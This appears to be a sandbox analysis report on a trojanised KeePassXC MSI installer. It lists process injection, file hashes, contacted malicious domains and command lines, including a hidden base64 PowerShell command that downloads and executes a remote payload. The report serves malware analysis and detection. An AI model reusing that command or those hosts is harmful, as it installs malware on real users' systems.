Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3996 wrote to memory of 3244 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3996 wrote to memory of 3244 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3996 wrote to memory of 3244 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3244 wrote to memory of 4584 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3244 wrote to memory of 4584 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3244 wrote to memory of 4584 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 3492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 3996 wrote to memory of 3492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 3996 wrote to memory of 3492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 3492 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 3492 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 3492 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 3492 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 1988 wrote to memory of 4028 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 4028 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 2844 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 1988 wrote to memory of 2844 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 1988 wrote to memory of 2844 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2796 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe
PID 2844 wrote to memory of 2796 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe
PID 2844 wrote to memory of 2796 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe
PID 2796 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe \??\c:\st\Autoit3.exe
PID 2796 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe \??\c:\st\Autoit3.exe
PID 2796 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe \??\c:\st\Autoit3.exe
PID 4548 wrote to memory of 2444 N/A \??\c:\st\Autoit3.exe \??\c:\windows\SysWOW64\cmd.exe
PID 4548 wrote to memory of 2444 N/A \??\c:\st\Autoit3.exe \??\c:\windows\SysWOW64\cmd.exe
PID 4548 wrote to memory of 2444 N/A \??\c:\st\Autoit3.exe \??\c:\windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 1496 N/A \??\c:\windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2444 wrote to memory of 1496 N/A \??\c:\windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2444 wrote to memory of 1496 N/A \??\c:\windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 51A3AC4FF8095876459BB49781BDF4DF

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3BD3.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi3BD0.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr3BD1.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr3BD2.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe

"C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3492 -ip 3492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 964

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe"

C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe

"C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe"

\??\c:\st\Autoit3.exe

"c:\st\Autoit3.exe" c:\st\script.a3x

\??\c:\windows\SysWOW64\cmd.exe

"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\bakfgfa\ffcfhbc

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic ComputerSystem get domain

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 not-pass.com udp
US 172.67.219.67:80 not-pass.com tcp
US 172.67.219.67:443 not-pass.com tcp
US 8.8.8.8:53 67.219.67.172.in-addr.arpa udp
US 8.8.8.8:53 gachi-lane.com udp
US 172.67.172.142:80 gachi-lane.com tcp
US 8.8.8.8:53 142.172.67.172.in-addr.arpa udp
US 8.8.8.8:53 raur94.com udp
US 172.67.195.205:80 raur94.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 172.67.195.205:443 raur94.com tcp
US 8.8.8.8:53 opensun.monster udp
US 172.67.160.176:443 opensun.monster tcp
US 8.8.8.8:53 205.195.67.172.in-addr.arpa udp
US 8.8.8.8:53 176.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 checkass.monster udp
US 172.67.129.199:443 checkass.monster tcp
US 8.8.8.8:53 199.129.67.172.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
NL 194.55.186.13:80 194.55.186.13 tcp
US 8.8.8.8:53 13.186.55.194.in-addr.arpa udp
US 8.8.8.8:53 dintrinnssports.shop udp
US 104.21.2.232:80 dintrinnssports.shop tcp
US 8.8.8.8:53 232.2.21.104.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp

Files

C:\Windows\Installer\MSI3856.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI3A2F.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

memory/4584-28-0x0000000004AF0000-0x0000000004B26000-memory.dmp

memory/4584-29-0x0000000005220000-0x0000000005848000-memory.dmp

memory/4584-30-0x0000000005940000-0x0000000005962000-memory.dmp

memory/4584-32-0x0000000005AC0000-0x0000000005B26000-memory.dmp

memory/4584-31-0x00000000059E0000-0x0000000005A46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adehlmyp.ihz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4584-42-0x0000000005CE0000-0x0000000006034000-memory.dmp

memory/4584-43-0x00000000060C0000-0x00000000060DE000-memory.dmp

memory/4584-44-0x0000000006100000-0x000000000614C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss3BD3.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/4584-46-0x0000000007830000-0x0000000007EAA000-memory.dmp

memory/4584-47-0x0000000006600000-0x000000000661A000-memory.dmp

memory/4584-48-0x00000000070D0000-0x0000000007166000-memory.dmp

memory/4584-49-0x00000000066B0000-0x00000000066D2000-memory.dmp

memory/4584-50-0x0000000008460000-0x0000000008A04000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scr3BD1.ps1

MD5 c5e6cb1760799fcd20cd069562b9c480
SHA1 f7c5201de15fc2a655dd5fca39616a0c461ad6b3
SHA256 c1e94bf5215a5a3508e24f3a0ca7f2a621a993ec22bf53bfc7cfc54bbfd32301
SHA512 c6b12f914a037c509cb8533af7112be775613ec28c80ddea2e869fd2792cf89d470c22f3599c9f936625f1bc7fc291932d2caa9fe433ba355ced3fdc2d7866c6

memory/4584-52-0x0000000008080000-0x0000000008242000-memory.dmp

memory/4584-53-0x0000000008F40000-0x000000000946C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msi3BD0.txt

MD5 d3cfb7d0c8d2e3fe6a0eb110baf7e755
SHA1 369e9d8630eda9fd3d0f9bf4daa815e33207ffd4
SHA256 5b0e557ac6fb728e4946ec8d27d97cab02d6e44dfc3a526d52643d758dbbff12
SHA512 2b1f4b3feba76460da5bbe70cf8c2744837859e8e9df2923984f99500a6a07cf996ea441aa245708d7a6f8616148360c7dc4eae989b9584e9869f8d3bbc12ebf

C:\Config.Msi\e5737cc.rbs

MD5 15dd794e48ae730d475190ed93c4a59e
SHA1 e1205720b936582f3a05edf0eb8eb661e1a45f91
SHA256 9d999f6a03afe2d396655d91db50beca54ee38e351b249ee367c4f48743bb6a9
SHA512 a11b45c264d78b964f367319668a227869722d04cb46af2551e4c346137473bf6c1af795a7fd12fe9cc063d11dcb91f802b919604a75c0910f517033667c4bec

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe

MD5 fc16fce41560bed85c97d9551fdfc3c1
SHA1 26a867e66cd4730383046de480aa1785d4b93bf2
SHA256 e35a84063e76646544486d2b172c7f0ffd52d28f9f258379370979b73bdc0857
SHA512 0954901366b8d2e4bf9ff0450c072bac6cc89113f304dfae2ff87e9d3d4380780122e1ce81ce1d908a364ff1970da9e85e3a41b54b13b83d1c147611a39fde91

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcc_s_dw2-1.dll

MD5 a542f74ee60dfbee3e8e919acb22e773
SHA1 8e3a47d726f3c7daf4b6168effbca676bcc0be2c
SHA256 f99611c9b7000dc50f4aeac26c590072bfecffdd1cba9903b6bed649eb14550c
SHA512 acfc819f23f49a296a9437a6f7aa2ce8066285312af5c72ca41973e7daa090e9ab6f30eeecb722756c2a5b3a70f959977f06c524cc11bf7c0bc99f1b3e58a7a1

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Core.dll

MD5 3dc9596998ebac48a1ea9d5557649eeb
SHA1 16115408bab17885ad9bf95810dbd7a35f159e4a
SHA256 3880e50ab6e204b9fbc2952ff39411a530612ddcbd82c296d916065f37b755e6
SHA512 7a6641b3f8bcfbe165aeb8f7477f931188e58a72bae63dfe2ba1c86736cdc6c7f6c86c0d433badb64f3c799202a2f5439eab0f04362b5b882f7f5c346f9765f9

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libdouble-conversion.dll

MD5 e1cd8a087c9b045fb6e770f27ef03707
SHA1 6d5aff3ccbfd81f0760a0d8d22799dce4973acb6
SHA256 eaa197134ecc9c8995ececdea42aaaa5b09a2039a608452ae3223d976da8efa5
SHA512 3ef02820c5fa2ffaf461d16f000894ec696da38431a158205fc74947b47c93d0de793c54c0b801acd2f7ebe9cfef3970cf8960c47597e94e62adcbb09196101a

memory/3492-183-0x0000000071810000-0x0000000071A0A000-memory.dmp

memory/1988-189-0x0000000000770000-0x0000000000798000-memory.dmp

memory/3492-191-0x00000000001F0000-0x00000000007BF000-memory.dmp

memory/3492-190-0x0000000062D80000-0x0000000062DBB000-memory.dmp

memory/3492-188-0x0000000072BC0000-0x000000007331D000-memory.dmp

memory/1988-187-0x0000000000770000-0x0000000000798000-memory.dmp

memory/3492-186-0x0000000003150000-0x0000000003175000-memory.dmp

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libzstd.dll

MD5 411642ebdf422cac211237a449ffb139
SHA1 cfb06e94ccdc6704d8ea3f5659481c317a0371af
SHA256 23272d4c3f19a13fa236369d2a296202a3c7067fa1698572dea9c23b9eae00b7
SHA512 4a144c877ec977ba6db0166ba3a559b9201bdc66c0bcf11b4772565c713a5f6f207168490b3a8231e6d23dd6041ce01df66e3af7d6b4899a743e6c3bfe598670

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpng16-16.dll

MD5 ac58db75da7b5ce9cfbe4987e7386319
SHA1 94c03ce52a34a189c75ba40f51df448e4b986cb4
SHA256 5d83d4535c4687f9d40bbe43f4f5d9e897f4d5996f211643273cf712b768706f
SHA512 0e3a5d8f9de9490fd0626c0aeaac44d3cb25a23dd5dd69fa985bc55617a86f881fad02a4d3531b10924a9446458552e7268b2dbafb819df60d3d0476e68d7af4

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpcre2-16-0.dll

MD5 bb8004dd00979ea17a243df6d40f2b05
SHA1 482b4ea7b92e3aee7b13278ee79ce84ee7e09d7a
SHA256 7df7355b2968a68491356e377da1fc772776b43033eb13df0738df90fdf54d32
SHA512 060e0e12b7a54ea023e2790c8f35d930427c33ca566f88a253f322d1022e6e399ace6c550b42252df07e1c609e6dabc73ad62b8f712e8c5a3fa3380274079d52

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuuc68.dll

MD5 484a47b28f7e935039289146d8592c73
SHA1 328681021f9ef4ef52a12e8bc944edaf9eed5689
SHA256 fd02a3c891349da4d956a13e189b57f23e1d1a22209dad3875ff72e2e85cd541
SHA512 83b5dbac473dd390c739a38b8cebedfae7c9949f583ddbb69326b9bd39aab8c28d40e6951acf47c10ea2ac51620e2de96912ab7aced713985b263769277129b5

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libharfbuzz-0.dll

MD5 4503f9be16890c735d37533f6b739c98
SHA1 3800d347d3e2c2099cedfcacacd2c53415f6310f
SHA256 020c3d69ec42f836daa1b7740c397badb921e9db6cc8b874a4a13bc5a9564ece
SHA512 7d3ac686380a52c3444138afa8394869e0cb780aa5af7fbd23c6703653f43a1bafd1a379884c830035a70a875b1e73ab609477e39e27698458b747f81bd463ff

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuin68.dll

MD5 fd240f08139a7bbefc3aeec099210579
SHA1 f2738c0a2b3ef6a51d7b89d731854a0924f71bfb
SHA256 e8e72f078844e6fc97fa9ed417eefef7fc30192b3f6f0074d6d6d80a176d3100
SHA512 14177b251e771c88148c9a2ff433f64c1a9c977320c42c882381e698fff7592148b6d7485c537bc720ac3685bb3cbef6cea63e50fe038c8f6a5b61e9460d16f4

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgpg-error-0.dll

MD5 c72948b84d9dd02eb85f1774739eafa8
SHA1 1f255f8b808ee310dba95beb896a3ec360f16ebc
SHA256 2b1df97fb3cf4a54d68bf7ca2611f0cc0663908309fd58a48989804dc4fec284
SHA512 fda087b6e86cf02dcf4324e391be2f8ef54dce9cb787dbc343d90efd9d9f54189fe0994fee628c0465c1c9f51c6d1783955c8002215517fc5358ae1e7518067b

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libwinpthread-1.dll

MD5 f73bb12c46d209ab7317f3ef878d4abe
SHA1 bd8acd83f4eb5afbb6ea2c90fe40062c58fd1ef4
SHA256 edb71eb6815bde6ec47b1167c74d26f7d9fd08bb6d4cfc3c08683eaeda39dcde
SHA512 88d8381f639350bab0d360a32370eee325ae2d0c366c898ce23ffc62f85ad921776aa856219671d39620c25d7856c82f19b2e7cdde6ac641092b2df8a0ab70ef

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\zlib1.dll

MD5 8b2a6e8419a8a4e7d3fd023d97455fb9
SHA1 2547a1f94fb4f83b7c133a3e285ee11faa155e84
SHA256 7087cdd1acdff6cd1b8d821388f430af3888314b05a5821bb53e67034362f670
SHA512 44438f6dd4becabc2cb3053e2c42877cbdb0f309fe272f67a94ad530caf1c5e5d49bc394f7d21c4226a4f0eb6d8661c5c7113508ea2f446e0dbea0d59554d4a4

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Widgets.dll

MD5 cdf811c8e5fc6b313c91b19d2362dc2c
SHA1 26cc74948b8082c3a2e2f348bdff903954974ec0
SHA256 da173ce470873cc18134dba881f8018656ca0ad03fb0cb5a3ea8552b8785f9de
SHA512 322da5b6063a03f599f3fdf3e0f86eb541912b9dd7ae4dc9e4ff10b8133c8e3797ebd9f31872f403c257d6456edd7eca2d28915396d3aefaf549816a4b59ae8a

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libykpers-1-1.dll

MD5 661ed9d4bd3bd416d31def947cd4f502
SHA1 d18fd6c6c9081648818a6654e5a74f8fcd21c1a3
SHA256 d72768f29c12fe808038feb80c8415bf8d47fe5e22a074214cf2c56bf90b7a09
SHA512 984e2b937ee469b86abc1a9b52407e746f976d01de2cf949e68dc079e498c1f7d5ec74b2ada7d5e0211f9d21b0e6ba4ce0ec66d1da73bcd11f1373022834f0bb

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libsodium-23.dll

MD5 270ca6cfb0bbb0cad78ce9b8d7ccc4f3
SHA1 eeed9ebcf68cc96e4c0e0a8c46010a7e634e207a
SHA256 e3659dab4b91636c27f3a41eda8d4afe59101021468eef539191d16a7b92da9e
SHA512 6c4102686fc83bdca4a495b1f68b5fe48a1be0e8c73bc8d97d0664a2ab1a6fde68f5e380dbfcb55698cc58fd42a9f04c47876a22167aa04be6b492ee0b7d91b6

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libquazip5.dll

MD5 83761f6a5bebfa2383a456325688c851
SHA1 0eb04f6a54b76135816be039b8a14ef297cb48cc
SHA256 824f08f9f69b5a28baeef5ef9d9335f9ad87600a830e304b1c696e2f97a92727
SHA512 9851ff17d653c0ac8c75c8694d630773474e62d03f64fbce93258b64b999dba23e80d3f8e3cf0287b2a492574a4fdeb6bd8a86070946e9ef6dfb912c31ed4cee

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Network.dll

MD5 883d51ff2fa63084fef0b252c62b259c
SHA1 375993ca6c25195302cff56da2a7f70ed116b681
SHA256 699225b460328cc4d6f026a57b89472db56aef46a242066c83f4c404ab9f386d
SHA512 dbed13d06af7cb25c3cbe6f02be3663125a6a340e0f82e565f32d66448296af6188f98c1082d5110be567788c04f47ef402bc730ca4d5eb0fc29e3bc527a31f8

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Svg.dll

MD5 b015508d22a275d220481547617f74bf
SHA1 b65eb8773297d988ce034795e95d1455dd1f09e2
SHA256 cf928b42713f1ae39fd6a3f084ba3aaa4d28cef7cfcd57ddd3e2883214fa6e91
SHA512 02adea4881ca255cef289b357eefcc0c989fb0ad9e2a211b508bdbaea9d4becdd030615bd68ecd7696b0b5fd8c6efc6580c4f05147f455b6b6155d3fd01397b0

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Gui.dll

MD5 b6b0178576ee844019d0f2fa214df8c8
SHA1 6bb884f83beac17f42597160d321d4ad2bd3c6c2
SHA256 455e4487b294c9648f2f4852ab68ba5d45e880bd1e8cf3d27e58150c2aedb20c
SHA512 e214e6232d4f2469769af243b01cde10e72ef1acdad1e92fe1e9cf7b74fd127831bc223a3ad983695f35e4eadfaff49110948d63e085c551094f534e33e04ab4

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Concurrent.dll

MD5 76e68d56326f70acb1c20bc3ad9ea20d
SHA1 f1f74224abed3f01f643b2a103c41158e586d827
SHA256 d84b30cf544bbf0657df31e196196877fa874b011a275afdd4bd39729070891f
SHA512 fd786822ea98ceffcad9266c306afb0ad08a82d389925eb6a8b077c7b153afeb91a622b6e31f26bbb8fcfd14183e4e8c1ab495154322e977cb74e5d33529d681

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libqrencode.dll

MD5 a1737041533ac620a8385c7b99046d18
SHA1 2154912e5ec6e84af91eb883f6fe41dfccef3b03
SHA256 8e214eec4218407c339f35cc4b133b82e264855a15c407f3f93fc12be93ac0db
SHA512 1508fe92ba0a0f14e93676f1d53923d0b91df4208d23897cd9003b0436bf826fb98ebd3514a8e6e9c15bf9d993fcb538dcfb0b8461f33bce835da736229804c2

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcrypt-20.dll

MD5 24dac6152c216a1b7b1afef7c36e2b65
SHA1 a832467931f07b3f41772d89feb194a90be4119b
SHA256 784af4a0d287a6611d5ee4fda32e31d7b3d5afcd14bca75d2564bb9f0045b449
